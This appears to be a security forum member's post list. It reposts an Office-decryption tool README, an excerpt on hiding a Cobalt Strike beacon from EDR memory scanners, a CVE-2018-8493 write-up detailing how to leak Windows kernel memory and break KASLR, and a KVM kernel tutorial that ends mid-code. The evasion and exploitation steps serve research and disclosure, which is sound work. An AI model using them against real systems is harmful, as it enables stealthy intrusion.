Everything posted by Nytro
-
SymDiff Diff tool for comparing symbols in PDB files https://github.com/WalkingCat/SymDiff
-
msoffcrypto-tool

msoffcrypto-tool (formerly ms-offcrypto-tool) is a Python tool and library for decrypting encrypted MS Office files with a password, an intermediate key, or the private key that generated its escrow key.

Early PoC version: https://github.com/nolze/ms-offcrypto-tool/tree/v0.1.0

Install

    pip install msoffcrypto-tool

Examples

As CLI tool (with password):

    msoffcrypto-tool -p Passw0rd encrypted.docx decrypted.docx

Test if the file is encrypted or not (exit code 0 or 1 is returned):

    msoffcrypto-tool --test -v document.doc

As library. Passwords and more key types are supported with the library functions:

    import msoffcrypto

    file = msoffcrypto.OfficeFile(open("encrypted.docx", "rb"))

    # Use password
    file.load_key(password="Passw0rd")

    # Use private key
    # file.load_key(private_key=open("priv.pem", "rb"))

    # Use intermediate key (secretKey)
    # file.load_key(secret_key=binascii.unhexlify("AE8C36E68B4BB9EA46E5544A5FDB6693875B2FDE1507CBC65C8BCF99E25C2562"))

    file.decrypt(open("decrypted.docx", "wb"))

Supported encryption methods (MS-OFFCRYPTO specs):

- ECMA-376 (Agile Encryption/Standard Encryption)
  - MS-DOCX (OOXML) (Word 2007-2016)
  - MS-XLSX (OOXML) (Excel 2007-2016)
  - MS-PPTX (OOXML) (PowerPoint 2007-2016)
- Office Binary Document RC4 CryptoAPI
  - MS-DOC (Word 2002, 2003, 2004)
  - MS-XLS (Excel 2002, 2003, 2004) (experimental)
  - MS-PPT (PowerPoint 2002, 2003, 2004)
- Office Binary Document RC4
  - MS-DOC (Word 97, 98, 2000)
  - MS-XLS (Excel 97, 98, 2000) (experimental)
  - MS-PPT (PowerPoint 97, 98, 2000)
- ECMA-376 (Extensible Encryption)
- XOR Obfuscation
- Other
  - Word 95 Encryption (Word 95 and prior)
  - Excel 95 Encryption (Excel 95 and prior)
  - PowerPoint 95 Encryption (PowerPoint 95 and prior)

PRs welcome!

Todo

- Add tests
- Support decryption with passwords
- Support older encryption schemes
- Add function-level tests
- Add API documents
- Publish to PyPI
- Add decryption tests for various file formats
- Merge into more comprehensive projects handling MS Office files (such as oletools?) if possible
- Support decrypting encrypted macros
- Support decrypting encrypted Excel worksheets
- Support decrypting editing protection
- Support encryption

Sursa: https://github.com/nolze/msoffcrypto-tool
-
Bypassing Memory Scanners with Cobalt Strike and Gargoyle
William Burgess, 18 July 2018

This blog post will present research into attempting to bypass memory scanners using Cobalt Strike's beacon payload and the gargoyle memory scanning evasion technique. It will demonstrate a proof of concept (PoC) which uses gargoyle to stage a Cobalt Strike beacon payload on a timer.

The assumption behind this PoC is that we will be up against Endpoint Detection and Response solutions (EDRs) using memory scanning techniques which occur at regular time intervals and that do not alert on non-executable memory (as this is likely to be extremely noisy and performance intensive at scale). By 'jumping' in and out of memory we aim to avoid having our payload resident in memory when a scanner runs and then re-stage it into memory when the coast is clear.

This post assumes some familiarity with the gargoyle memory scanning evasion technique and Matt Graeber's technique for writing optimized Windows shellcode in C.

Introduction

Modern enterprises are increasingly adopting sophisticated endpoint detection and response solutions (EDRs) which specialise in detecting advanced malware at scale across an enterprise. Examples of these include Carbon Black, Crowdstrike's Falcon, ENDGAME, CyberReason, Countercept, Cylance and FireEye HX.[1]

One of the challenges MWR face when conducting targeted attack simulations is that we will frequently obtain a foothold on a host which is running some type of EDR solution. As a result, it is vital that we are able to bypass any advanced detection capabilities in place to remain hidden.
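The "jumping in and out of memory" idea can be modelled in a few lines. This is a toy simulation only, not the actual PoC (which relies on Windows timers, page-protection changes and ROP); the payload, XOR key and tick schedule are all hypothetical stand-ins:

```python
# toy model of the gargoyle idea: the payload is plaintext in "memory" only
# between timer ticks, and the periodic scanner only runs while it is staged out
PAYLOAD = b"simulated beacon payload"   # hypothetical payload bytes
XOR_KEY = 0x42                          # hypothetical obfuscation key

def toggle(buf):
    # XOR stand-in for staging the payload in/out (and flipping page protections)
    return bytes(b ^ XOR_KEY for b in buf)

def scanner_sees_payload(memory):
    # a scanner that only flags the plaintext payload (ignores "non-executable" data)
    return PAYLOAD in memory

memory = toggle(PAYLOAD)   # start staged out: obfuscated, "non-executable"
detections = 0
for tick in range(10):
    memory = toggle(memory)                  # timer fires: re-stage payload, do work
    assert scanner_sees_payload(memory)      # the payload is resident right now...
    memory = toggle(memory)                  # ...but staged back out before sleeping
    if scanner_sees_payload(memory):         # periodic scan lands in the gap
        detections += 1

assert detections == 0  # the scanner never observed the plaintext payload
```

The model only illustrates the timing argument: if the scan interval never overlaps the resident window, a scanner that ignores non-executable memory sees nothing.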
Many EDR solutions feature powerful capabilities that can be effective at detecting suspicious behaviour on a compromised host, such as:

- Memory scanning techniques, such as looking for reflectively loaded DLLs, injected threads [2] and inline/IAT/EAT hooking [3]
- Real-time system tracing, such as process execution, file writes and registry activity
- Command line logging and analysis
- Network tracing
- Common cross-process access techniques, such as monitoring for CreateRemoteThread, WriteProcessMemory and VirtualAllocEx

Articol complet: https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/
-
EXPLOITING WINDOWS' IP ID RANDOMIZATION BUG TO LEAK KERNEL DATA AND MORE (CVE-2018-8493)
October 30, 2018 Ran Menscher

IP fragmentation is an ancient mechanism that nevertheless still yields surprising attacks today, due to its complexity. This post explains CVE-2018-8493, an interesting vulnerability that I recently found and that was patched in the latest Patch Tuesday.

INTRODUCTION

The IP protocol suite supports fragmentation in order to transport packets longer than a link's MTU. The design relies on an identification field ("IP ID"), such that all fragments that belong to the same packet have the same IP ID.

(Figure: example of a fragmented IPv6 packet; the IP ID is shown as "ident" in the packet's summary. IPv4 only uses a 15-bit identification field, whereas IPv6 uses 31 bits, which appear in an IPv6 optional header.)

In 2003 it was shown that this design was vulnerable, as (in a naïve implementation, a global counter) an attacker could blindly intercept or discard packets. Later, more mature demonstrations surfaced (e.g. this one). Before that, predicting this identification field allowed attackers to scan networks without disclosing the compromised node ("idle scan").

An excerpt from this master's thesis shows the state of the art (2013) with major OSs' implementations of the IP ID assignment method:

(Figure: algorithms used to generate IP IDs in various OSs, as tested by Mathias Morbitzer in 2013)

Notice how Windows and non-BSD Linux are marked "Global" for a global counter. Not too great…

SO THEY SOLVED IT!

Around that time Microsoft started generating the IP ID randomly, uniquely per IP path (= src,dst tuple). They chose the Toeplitz hash for this task (with a random 40-byte key). Why? Because they were implementing Receive-Side Scaling, as hinted by the "Rss" prefix on the functions used. While mixing performance and security is not always the best idea, this design could in principle still be safe… but we'll see.
IMPLEMENTATION

The IP ID is calculated in the following way:

    identification = base + increment

base is calculated at IP path allocation (first packet sent to a new remote address). The logic is:

    base = IpFragmentIdSecretTable ^ RssHashComputeToeplitzHash(protocol_family, SourceAddress, RemoteAddress);

IpFragmentIdSecretTable is a random DWORD generated on system start, and RssHashComputeToeplitzHash calls RtlComputeToeplitzHash on the {SrcIP,DstIP} tuple.

increment is a DWORD out of an 0x8000-byte table called IpFragmentIdIncrementTable:

    increment = IpFragmentIdIncrementTable[(RssHashComputeToeplitzStreamHash(...) ^ IpFragmentIdSecretTableHighWord) & 0x1FFF]

CVE-2018-8493

ExAllocatePoolWithTag is called to allocate 0x8000 bytes, while BCryptGenRandom initializes only 8 bytes (the rest are left with previous data from the kernel's usage).

The vulnerability lies in the fact that IpFragmentIdIncrementTable is not initialized with random content. It used to be (as it is in 6.2.9200.16399, from 2012), but in the current latest Windows 10 and 8.1 versions only 8 of its 0x8000 bytes are initialized. The rest is uninitialized, non-zeroed kernel memory, as received from ExAllocatePoolWithTagPriority.

For this reason it is very likely that the increment value for an IP path is zero; the attacker has many attempts to "hit" zero table entries, and can simply rank candidates for the key, choosing the highest ranking. Using two samples of an identification field that were generated for different IP paths, and whose increment value is zero, it is possible to calculate a DWORD out of the key that is used for hashing, IpRssToeplitzHashKey.
RtlComputeToeplitzHash's logic is:

    int RtlComputeToeplitzHash(...) {
        result = 0;
        do {
            result ^= matrices[2*offset+1][*input & 0xF] ^ matrices[2*offset][*input >> 4];
            offset += 2;
            input++;
        } while (remaining_bytes--);
        return result;
    }

Essentially, each nibble from the input is used as an offset into a Toeplitz matrix; the matrices are generated from IpRssToeplitzHashKey, taking a DWORD and a fifth byte each time, and taking a 32-bit "window" of the two with a specific bit offset (here I refer to the windowing as "rol").

A Toeplitz matrix is simply a list of cells, each holding a mix of key bits (32 bits at a time), rolled a various number of times and XORed together. An example to give the impression of it (cells indexed by nibble value 0..15):

    0
    rol(key,3)
    rol(key,2)
    rol(key,3) ⊕ rol(key,2)
    rol(key,1)
    rol(key,3) ⊕ rol(key,1)
    rol(key,2) ⊕ rol(key,1)
    rol(key,3) ⊕ rol(key,2) ⊕ rol(key,1)
    rol(key,0)
    rol(key,3) ⊕ rol(key,0)
    rol(key,2) ⊕ rol(key,0)
    rol(key,3) ⊕ rol(key,2) ⊕ rol(key,0)
    rol(key,1) ⊕ rol(key,0)
    rol(key,3) ⊕ rol(key,1) ⊕ rol(key,0)
    rol(key,2) ⊕ rol(key,1) ⊕ rol(key,0)
    rol(key,3) ⊕ rol(key,2) ⊕ rol(key,1) ⊕ rol(key,0)

Important observations I had about this matrix and algorithm:

- The different cells contain different numbers of XOR'd elements.
- The hash state evolves by XORing itself with a new value.
- If we take two inputs that are identical besides their last element (= last nibble), the hashing state for the two would be identical until the last iteration, where it evolves like this (I've taken 1 and 9 as the last nibbles of the two samples):

    Result1 ^= rol(key,3)
    Result2 ^= rol(key,3) ^ rol(key,0)

In this case, Result1 ^ Result2 gives rol(key,0), which is simply key. This is true for any pair of nibbles that are a XOR of 8 from each other (a Toeplitz matrix characteristic). And depending on the offset of the non-identical nibbles, different parts of the key are uncovered.

PUTTING IT ALL TOGETHER

Take two IP ID samples for which the IpFragmentIdIncrementTable cell is zero.
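The XOR-of-8 property can be checked with a generic bitwise Toeplitz hash. This is a sketch, not Windows' exact RtlComputeToeplitzHash: the key, the path bytes, and the helper names are all made up for illustration.

```python
import random

random.seed(1)
KEY_BITS = ''.join(random.choice('01') for _ in range(40 * 8))  # 40-byte key as a bit string

def key_window(offset, width=32):
    # the 32-bit "rolled" window of the key starting at bit `offset`
    return int(KEY_BITS[offset:offset + width], 2)

def toeplitz_hash(data):
    # classic Toeplitz: for every set bit of the input stream,
    # XOR in the key window at that bit position
    result, bitpos = 0, 0
    for byte in data:
        for bit in range(7, -1, -1):
            if (byte >> bit) & 1:
                result ^= key_window(bitpos)
            bitpos += 1
    return result

# two "IP paths" identical except the first nibble, whose values are a XOR of 8 apart
path1 = bytes([0x10, 0x22, 0x33, 0x44])
path2 = bytes([0x90, 0x22, 0x33, 0x44])   # 0x1 ^ 0x9 == 8 in the high nibble

# only bit 0 of the stream differs, so the hashes differ by exactly key_window(0):
# the first 32 bits of the key fall straight out of the XOR
assert toeplitz_hash(path1) ^ toeplitz_hash(path2) == key_window(0)
```

Pairs differing at a later nibble position leak a later window of the key, which is how the whole key is recovered piece by piece.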
(You don't know this in advance, but get enough samples, do the whole process, and a clear winner will emerge.)

Therefore: Identification = secret_dword ^ hash(ip_path)

The IP paths are identical except for one nibble, where the two values are a XOR of 8 from each other. Therefore: Hash1 ^ Hash2 = key

And lastly (because the secret_dword XORs itself out): Sample1 ^ Sample2 = key

This can be continued to get all the other key parts.

READING UNINITIALIZED KERNEL MEMORY

XORing two IP ID samples (with table values of zero) yields a key part, which we now know. With one sample and a key part, we can calculate the expected IP ID for other IP paths, assuming the table content for them is zero. Compare this with an actual sample of the IP ID for that IP path: if it's greater than the expected value, the difference must be the cell content. Kernel data!

The results of a crude PoC:

(Figure: output of a simple PoC to read 8 bytes of the key (above), and use those to read uninitialized data (below))

SUMMARY OF THE ATTACK

- Generate/acquire as many pairs of samples of fragmented IP packets sent on different IP paths as possible. The pairs must have paths identical except for one nibble, where the two samples hold values that are a XOR of 8 from each other.
- XOR the IP IDs.
- Rank the outcomes: the one with the most occurrences is a DWORD from the key.
- Keep the IP IDs and IP paths that gave the correct outcome.
- Use those against other IP paths, where the relation is not a XOR of 8. Calculate the expected result (now that you have the key); the difference between the actual result and the expected one is uninitialized kernel memory.
- Break KASLR.

(For the advanced students: add logic that adjusts the outcomes to the fact that the IP IDs are only read in windows of 31 bits.)

FINAL WORDS

A special thanks goes to @tom41sh from MSRC and the wise @ace__pace

Sursa: https://menschers.com/2018/10/30/what-is-cve-2018-8493/
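The ranking step of the summary can be simulated end to end. This is a toy model assuming a mostly-zero increment table; the key value, seed, sample counts and table density are arbitrary choices, not Windows' values:

```python
import random
from collections import Counter

random.seed(7)
KEY_DWORD = 0xDEADBEEF                      # the key dword the attacker wants (made up)
SECRET = random.getrandbits(32)             # stand-in for IpFragmentIdSecretTable
TABLE = [0] * 0x2000                        # increment table: mostly zero...
for i in random.sample(range(0x2000), 3000):
    TABLE[i] = random.getrandbits(32)       # ...with some uninitialized junk

def ip_id(path_hash):
    # identification = base + increment, base = secret ^ hash(path)
    return ((SECRET ^ path_hash) + TABLE[random.randrange(0x2000)]) & 0xFFFFFFFF

votes = Counter()
for _ in range(2000):
    h1 = random.getrandbits(32)
    h2 = h1 ^ KEY_DWORD                     # the XOR-8 path-pair property
    votes[ip_id(h1) ^ ip_id(h2)] += 1       # equals the key only when both increments are 0

# rank the XOR outcomes: the clear winner is the key dword
assert votes.most_common(1)[0][0] == KEY_DWORD
```

Because both increments are zero for a large fraction of pairs, the correct key dword dominates the vote while every other outcome is essentially unique.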
-
[Note] Learning KVM - implement your own Linux kernel

A few weeks ago I solved a great KVM escaping challenge from TWCTF hosted by @TokyoWesterns. I have written a writeup on my blog: [Write-up] TokyoWesterns CTF 2018 - pwn240+300+300 EscapeMe, but it mentions nothing about KVM because there's no bug (at least I didn't find one) around it.

Most introductions to KVM I found actually introduce either libvirt or qemu and lack details on how to use KVM by hand; that's why I wrote this post. This thread is a good start for implementing a simple KVM program. Some projects such as kvm-hello-world and kvmtool are worth a look as well, and OSDev.org has great resources for learning system-architecture knowledge.

In this post I will introduce how to use KVM directly and how it works; I hope this article can be a quick start for beginners learning KVM. I've created a public repository for the source code of the KVM-based hypervisor and the kernel: david942j/kvm-kernel-example. You can clone and try it after reading this article.

Warning: all code in this post may be simplified to clearly show its function. If you want to write some code, I highly recommend you read the examples in the repository instead of copy-pasting code from here.

The kernel I implemented is able to execute an ELF in user space; this is a screenshot of the execution result:

Introduction

KVM (Kernel-based Virtual Machine) is a virtual machine implemented natively in the Linux kernel. As you know, a VM is usually used for creating a separate and independent environment. As the official site describes, each virtual machine created by KVM has private virtualized hardware: a network card, disk, graphics adapter, etc.

First I'll introduce how to use KVM to execute simple assembled code, and then describe some key points for implementing a Linux kernel. The Linux kernel we will implement is extremely simple, but more features might be added after this post is released.
Get Started

All communication with KVM is done via the ioctl syscall, which is usually used for getting and setting device status. Creating a KVM-based VM basically needs 7 steps:

1. Open the KVM device: kvmfd = open("/dev/kvm", O_RDWR|O_CLOEXEC)
2. Create a VM: vmfd = ioctl(kvmfd, KVM_CREATE_VM, 0)
3. Set up memory for the VM guest: ioctl(vmfd, KVM_SET_USER_MEMORY_REGION, &region)
4. Create a virtual CPU for the VM: vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, 0)
5. Set up memory for the vCPU: vcpu_size = ioctl(kvmfd, KVM_GET_VCPU_MMAP_SIZE, NULL); run = (struct kvm_run*)mmap(NULL, vcpu_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpufd, 0)
6. Put assembled code in the user memory region, and set up the vCPU's registers, such as rip
7. Run and handle the exit reason: while(1) { ioctl(vcpufd, KVM_RUN, 0); ... }

Too complicated!? See this figure:

A VM needs a user memory region and virtual CPU(s), so all we need is to create a VM, set up the user memory region, create vCPU(s) and their working space, then execute it! Code is better than plain text for hackers.

Warning: code posted here has no error handling.

Step 1 - 3, set up a new VM:

    /* step 1~3, create VM and set up user memory region */
    void kvm(uint8_t code[], size_t code_len) {
      // step 1, open /dev/kvm
      int kvmfd = open("/dev/kvm", O_RDWR|O_CLOEXEC);
      if(kvmfd == -1) errx(1, "failed to open /dev/kvm");

      // step 2, create VM
      int vmfd = ioctl(kvmfd, KVM_CREATE_VM, 0);

      // step 3, set up user memory region
      size_t mem_size = 0x40000000; // size of user memory you want to assign
      void *mem = mmap(0, mem_size, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
      int user_entry = 0x0;
      memcpy((void*)((size_t)mem + user_entry), code, code_len);
      struct kvm_userspace_memory_region region = {
        .slot = 0,
        .flags = 0,
        .guest_phys_addr = 0,
        .memory_size = mem_size,
        .userspace_addr = (size_t)mem
      };
      ioctl(vmfd, KVM_SET_USER_MEMORY_REGION, &region);
      /* end of step 3 */

      // not finished ...
    }

In the above code fragment I assign 1GB of memory (mem_size) to the guest, and put the assembled code on the first page.
Later we will set the instruction pointer to 0x0 (user_entry), where the guest starts executing.

Step 4 - 6, set up a new vCPU:

    /* step 4~6, create and set up vCPU */
    void kvm(uint8_t code[], size_t code_len) {
      /* ... step 1~3 omitted */

      // step 4, create vCPU
      int vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, 0);

      // step 5, set up memory for vCPU
      size_t vcpu_mmap_size = ioctl(kvmfd, KVM_GET_VCPU_MMAP_SIZE, NULL);
      struct kvm_run* run = (struct kvm_run*) mmap(0, vcpu_mmap_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpufd, 0);

      // step 6, set up vCPU's registers
      /* standard registers include general-purpose registers and flags */
      struct kvm_regs regs;
      ioctl(vcpufd, KVM_GET_REGS, &regs);
      regs.rip = user_entry;
      regs.rsp = 0x200000; // stack address
      regs.rflags = 0x2;   // in x86 the 0x2 bit should always be set
      ioctl(vcpufd, KVM_SET_REGS, &regs); // set registers

      /* special registers include segment registers */
      struct kvm_sregs sregs;
      ioctl(vcpufd, KVM_GET_SREGS, &sregs);
      sregs.cs.base = sregs.cs.selector = 0; // let base of code segment equal zero
      ioctl(vcpufd, KVM_SET_SREGS, &sregs);

      // not finished ...
    }

Here we create a vCPU and set up its registers, including standard registers and "special" registers. Each kvm_run structure corresponds to one vCPU, and we will use it to get the CPU status after execution. Notice that we can create multiple vCPUs under one VM; with multiple threads we can then emulate a VM with multiple CPUs.

Note: by default, the vCPU runs in real mode, which only executes 16-bit assembled code. To run 32- or 64-bit code, the page tables must be set up, which we'll describe later.

Step 7, execute!

    /* last step, run it! */
    void kvm(uint8_t code[], size_t code_len) {
      /* ... step 1~6 omitted */

      // step 7, execute vm and handle exit reason
      while (1) {
        ioctl(vcpufd, KVM_RUN, NULL);
        switch (run->exit_reason) {
          case KVM_EXIT_HLT:
            fputs("KVM_EXIT_HLT", stderr);
            return;
          case KVM_EXIT_IO:
            /* TODO: check port and direction here */
            putchar(*(((char *)run) + run->io.data_offset));
            break;
          case KVM_EXIT_FAIL_ENTRY:
            errx(1, "KVM_EXIT_FAIL_ENTRY: hardware_entry_failure_reason = 0x%llx",
                 run->fail_entry.hardware_entry_failure_reason);
          case KVM_EXIT_INTERNAL_ERROR:
            errx(1, "KVM_EXIT_INTERNAL_ERROR: suberror = 0x%x", run->internal.suberror);
          case KVM_EXIT_SHUTDOWN:
            errx(1, "KVM_EXIT_SHUTDOWN");
          default:
            errx(1, "Unhandled reason: %d", run->exit_reason);
        }
      }
    }

Typically we only care about the first two cases, KVM_EXIT_HLT and KVM_EXIT_IO. The hlt instruction triggers KVM_EXIT_HLT; the in and out instructions trigger KVM_EXIT_IO. And not only for I/O: we can also use this as a hypercall, i.e. to communicate with the host. Here we only print the character sent to the device.

ioctl(vcpufd, KVM_RUN, NULL) runs until an exit-like instruction occurs (such as hlt, out, or an error). You can also enable single-step mode (not demonstrated here); then it stops on every instruction.

Let's try our first KVM-based VM:

    int main() {
      /*
        .code16
        mov al, 0x61
        mov dx, 0x217
        out dx, al
        mov al, 10
        out dx, al
        hlt
      */
      uint8_t code[] = "\xB0\x61\xBA\x17\x02\xEE\xB0\n\xEE\xF4";
      kvm(code, sizeof(code));
    }

And the execution result is:

    $ ./kvm
    a
    KVM_EXIT_HLT

64-bit World

To execute 64-bit assembled code, we need to put the vCPU into long mode. This wiki page describes how to switch from real mode to long mode; I highly recommend you read it as well. The most complicated part of switching into long mode is setting up the page tables that map virtual addresses to physical addresses. The x86-64 processor uses a memory-management feature named PAE (Physical Address Extension), which consists of four kinds of tables: PML4T, PDPT, PDT, and PT.
The way these tables work is that each entry in the PML4T points to a PDPT, each entry in a PDPT to a PDT, and each entry in a PDT to a PT. Each entry in a PT then points to a physical address.

(source: https://commons.wikimedia.org)

The figure above shows what is called 4K paging. There's another paging method named 2M paging, with the PT (page table) removed; in this method the PDT entries point directly to physical addresses. The control registers (cr*) are used for setting paging attributes; for example, cr3 should point to the physical address of the PML4. More information about control registers can be found on Wikipedia.

This code sets up the tables, using 2M paging:

    /* Maps: 0 ~ 0x200000 -> 0 ~ 0x200000 */
    void setup_page_tables(void *mem, struct kvm_sregs *sregs) {
      uint64_t pml4_addr = 0x1000;
      uint64_t *pml4 = (void *)(mem + pml4_addr);

      uint64_t pdpt_addr = 0x2000;
      uint64_t *pdpt = (void *)(mem + pdpt_addr);

      uint64_t pd_addr = 0x3000;
      uint64_t *pd = (void *)(mem + pd_addr);

      pml4[0] = 3 | pdpt_addr; // PDE64_PRESENT | PDE64_RW | pdpt_addr
      pdpt[0] = 3 | pd_addr;   // PDE64_PRESENT | PDE64_RW | pd_addr
      pd[0] = 3 | 0x80;        // PDE64_PRESENT | PDE64_RW | PDE64_PS

      sregs->cr3 = pml4_addr;
      sregs->cr4 = 1 << 5;     // CR4_PAE
      sregs->cr4 |= 0x600;     // CR4_OSFXSR | CR4_OSXMMEXCPT; /* enable SSE instructions */
      sregs->cr0 = 0x80050033; // CR0_PE | CR0_MP | CR0_ET | CR0_NE | CR0_WP | CR0_AM | CR0_PG
      sregs->efer = 0x500;     // EFER_LME | EFER_LMA
    }

There are some control bits recorded in the tables, including whether the page is mapped, is writable, and can be accessed in user mode. For example, 3 (PDE64_PRESENT|PDE64_RW) indicates that the memory is mapped and writable, and 0x80 (PDE64_PS) indicates 2M paging instead of 4K. As a result, these page tables map addresses below 0x200000 to themselves (i.e. virtual address equals physical address).
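The identity mapping can be sanity-checked by walking the same three tables in a few lines. A sketch of the 2M-paging walk, mirroring the table layout that setup_page_tables builds (the dict-based "physical memory" is of course an invention of this sketch):

```python
PRESENT, RW, USER, PS = 1, 2, 4, 0x80   # the PDE64_* control bits from the text

# guest "physical memory" holding the three tables from setup_page_tables()
mem = {
    0x1000: {0: PRESENT | RW | 0x2000},   # PML4 -> PDPT at 0x2000
    0x2000: {0: PRESENT | RW | 0x3000},   # PDPT -> PD at 0x3000
    0x3000: {0: PRESENT | RW | PS | 0x0}, # PD: one 2M page at physical 0
}
cr3 = 0x1000  # points to the PML4

def translate(vaddr):
    # index bits: PML4 [47:39], PDPT [38:30], PD [29:21]; 2M page offset [20:0]
    pml4e = mem[cr3][(vaddr >> 39) & 0x1FF]
    pdpte = mem[pml4e & ~0xFFF][(vaddr >> 30) & 0x1FF]
    pde   = mem[pdpte & ~0xFFF][(vaddr >> 21) & 0x1FF]
    assert pde & PRESENT and pde & PS   # mapped, and a 2M page (no PT level)
    # a user-mode access would additionally require the USER bit on every level
    return (pde & ~0x1FFFFF) | (vaddr & 0x1FFFFF)

assert translate(0x1234) == 0x1234      # identity mapping below 0x200000
```

Every address under 0x200000 walks through entry 0 of each table and lands on the single 2M page whose physical base is 0, hence virtual equals physical.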
What remains is setting the segment registers:

    void setup_segment_registers(struct kvm_sregs *sregs) {
      struct kvm_segment seg = {
        .base = 0,
        .limit = 0xffffffff,
        .selector = 1 << 3,
        .present = 1,
        .type = 11, /* execute, read, accessed */
        .dpl = 0,   /* privilege level 0 */
        .db = 0,
        .s = 1,
        .l = 1,
        .g = 1,
      };
      sregs->cs = seg;
      seg.type = 3; /* read/write, accessed */
      seg.selector = 2 << 3;
      sregs->ds = sregs->es = sregs->fs = sregs->gs = sregs->ss = seg;
    }

We only need to modify the VM setup in step 6 to support 64-bit instructions. Change the code from

    sregs.cs.base = sregs.cs.selector = 0; // let base of code segment equal zero

to

    setup_page_tables(mem, &sregs);
    setup_segment_registers(&sregs);

Now we can execute 64-bit assembled code:

    int main() {
      /*
        movabs rax, 0x0a33323144434241
        push 8
        pop rcx
        mov edx, 0x217
      OUT:
        out dx, al
        shr rax, 8
        loop OUT
        hlt
      */
      uint8_t code[] = "H\xB8\x41\x42\x43\x44\x31\x32\x33\nj\bY\xBA\x17\x02\x00\x00\xEEH\xC1\xE8\b\xE2\xF9\xF4";
      kvm(code, sizeof(code));
    }

And the execution result is:

    $ ./kvm64
    ABCD123
    KVM_EXIT_HLT

The source code of the hypervisor can be found in repository/hypervisor. So far you are already able to run x86-64 assembled code under KVM, so our introduction to KVM is almost finished (except for handling hypercalls). In the next section I will describe how to implement a simple kernel, which involves some OS knowledge. If you are interested in how a kernel works, go ahead.

Kernel

Before implementing a kernel, some questions need to be dealt with:

- How does the CPU distinguish between kernel mode and user mode?
- How does the CPU transfer control to the kernel when the user invokes a syscall?
- How does the kernel switch between kernel and user?

kernel-mode v.s. user-mode

An important difference between kernel mode and user mode is that some instructions can only be executed in kernel mode, such as hlt and wrmsr. The two modes are distinguished by the dpl (descriptor privilege level) field in segment register cs.
dpl=3 in cs means user mode, and zero means kernel mode (I'm not sure if this "level" is equivalent to the so-called ring3 and ring0). In real mode the kernel has to handle the segment registers carefully, while in x86-64 the instructions syscall and sysret set the segment registers properly and automatically, so we don't need to maintain them manually.

Another difference is the permission setting in the page tables. In the above example I set all entries as non-user-accessible:

    pml4[0] = 3 | pdpt_addr; // PDE64_PRESENT | PDE64_RW | pdpt_addr
    pdpt[0] = 3 | pd_addr;   // PDE64_PRESENT | PDE64_RW | pd_addr
    pd[0] = 3 | 0x80;        // PDE64_PRESENT | PDE64_RW | PDE64_PS

If the kernel wants to create virtual memory for user space, for example when handling an mmap syscall from the user, the page table entries must have the 3rd bit set, i.e. bit (1 << 2); then the page can be accessed in user space. For example:

    pml4[0] = 7 | pdpt_addr; // PDE64_USER | PDE64_PRESENT | PDE64_RW | pdpt_addr
    pdpt[0] = 7 | pd_addr;   // PDE64_USER | PDE64_PRESENT | PDE64_RW | pd_addr
    pd[0] = 7 | 0x80;        // PDE64_USER | PDE64_PRESENT | PDE64_RW | PDE64_PS

This is just an example; we should NOT set user-accessible pages in the hypervisor. User-accessible pages should be handled by our kernel.

Syscall

There's a special register that can enable the syscall/sysret instructions: EFER (Extended Feature Enable Register). We have already used it for entering long mode:

    sregs->efer = 0x500; // EFER_LME | EFER_LMA

LME and LMA stand for Long Mode Enable and Long Mode Active, respectively. To enable syscall as well, we should do:

    sregs->efer |= 0x1; // EFER_SCE

We also need to register a syscall handler so that the CPU knows where to jump when the user invokes a syscall. Of course, this registration should be done in the kernel instead of the hypervisor. Registering the syscall handler is achieved by setting special registers called MSRs (Model Specific Registers). We can get/set MSRs in the hypervisor through ioctl on vcpufd, or in the kernel using the instructions rdmsr and wrmsr.
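rdmsr/wrmsr move the 64-bit MSR value through the edx:eax register pair, with the MSR index in ecx. A quick sketch of that split and recombination (the handler address is a hypothetical value; the MSR_LSTAR index matches the Linux sources):

```python
MSR_LSTAR = 0xC0000082   # long-mode syscall target MSR index (goes in ecx)

def wrmsr_operands(value):
    # wrmsr consumes the 64-bit value as edx:eax (high:low 32 bits)
    eax = value & 0xFFFFFFFF
    edx = (value >> 32) & 0xFFFFFFFF
    return edx, eax

def rdmsr_value(edx, eax):
    # rdmsr returns the value the same way; recombine to 64 bits
    return (edx << 32) | eax

handler = 0xFFFFF80012345678   # hypothetical address of a syscall_handler
edx, eax = wrmsr_operands(handler)
assert (edx, eax) == (0xFFFFF800, 0x12345678)
assert rdmsr_value(edx, eax) == handler
```

This is exactly the dance the registration assembly performs with mov eax, edi / mov rdx, rdi / shr rdx, 32 before wrmsr.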
To register a syscall handler:

    lea rdi, [rip+syscall_handler]
    call set_handler

    syscall_handler:
      // handle syscalls!

    set_handler:
      mov eax, edi
      mov rdx, rdi
      shr rdx, 32         /* input of msr is edx:eax */
      mov ecx, 0xc0000082 /* MSR_LSTAR, Long Syscall TARget */
      wrmsr
      ret

The magic number 0xc0000082 is the index of the MSR; you can find the definitions in the Linux source code. After this setup, we can invoke the syscall instruction and the program will jump to the handler we registered.

The syscall instruction not only changes rip, it also sets rcx to the return address so that the kernel knows where to go back to after handling the syscall, and saves rflags in r11. It changes the two segment registers cs and ss as well, which we will describe in the next section.

Switching between kernel and user

We also need to register the cs selectors for both kernel and user, via the MSRs we have used before. Here and here describe in detail what syscall and sysret do, respectively. From the pseudocode of sysret you can see that it sets the attributes of cs and ss explicitly:

    CS.Selector ← IA32_STAR[63:48]+16;
    CS.Selector ← CS.Selector OR 3; /* RPL forced to 3 */
    /* Set rest of CS to a fixed value */
    CS.Base ← 0;        /* Flat segment */
    CS.Limit ← FFFFFH;  /* With 4-KByte granularity, implies a 4-GByte limit */
    CS.Type ← 11;       /* Execute/read code, accessed */
    CS.S ← 1;
    CS.DPL ← 3;
    CS.P ← 1;
    CS.L ← 1;
    CS.G ← 1;           /* 4-KByte granularity */
    CPL ← 3;
    SS.Selector ← (IA32_STAR[63:48]+8) OR 3; /* RPL forced to 3 */
    /* Set rest of SS to a fixed value */
    SS.Base ← 0;        /* Flat segment */
    SS.Limit ← FFFFFH;  /* With 4-KByte granularity, implies a 4-GByte limit */
    SS.Type ← 3;        /* Read/write data, accessed */
    SS.S ← 1;
    SS.DPL ← 3;
    SS.P ← 1;
    SS.B ← 1;           /* 32-bit stack segment */
    SS.G ← 1;           /* 4-KByte granularity */

We have to register the value of cs for both kernel and user through the MSR:

    xor rax, rax
